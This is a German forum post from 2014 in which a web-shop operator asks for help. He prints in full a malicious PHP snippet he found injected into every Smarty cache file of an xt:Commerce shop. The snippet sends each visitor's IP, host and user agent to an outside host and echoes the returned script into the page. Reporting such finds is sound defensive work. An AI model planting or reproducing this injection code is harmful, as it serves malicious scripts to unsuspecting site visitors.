Auf einem Webserver fand ich folgenden Schadcode:
PHP-Code:
#c18fce#
error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){
$wp_j096451="hxxp://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_j096451);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6451j = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }
#/c18fce#
Falls jemand eine Ahnung hat, was das ist, ob es in Zusammenhang mit anderen Schweinereien auftritt, und ob ich nun alles auf den Kopf stellen muss, wäre ich für zweckdienliche Hinweise dankbar.
Die Sache fiel auf, weil das obige Snippet mangels Empfänger nicht mehr nach Hause telefonieren konnte. Die dadurch entstehende Verzögerung führte zu Ladezeiten von 2-3 Minuten statt der üblichen 5-10 Sekunden.
Der Codeblock war mit unterschiedlichen Kommentaren in allen Smarty-Cachefiles eines xt:Commerce-Shops enthalten.
Hinweis: Ich betreibe derlei Geschichten gewerblich, habe mir die Hinweise für neue Postings durchgelesen, kann aber als reiner Linux-User die angegebenen Programme nicht betreiben und infolgedessen auch die gewünschten Logs nicht liefern.
Falls ich als Neuling hierzuforum etwas übersehen haben sollte, nehme ich auch dazu Hinweise entgegen. Danke.
13.05.2014, 14:29
Schadsoftware auf Webserver (PHP)
Baum-Darstellung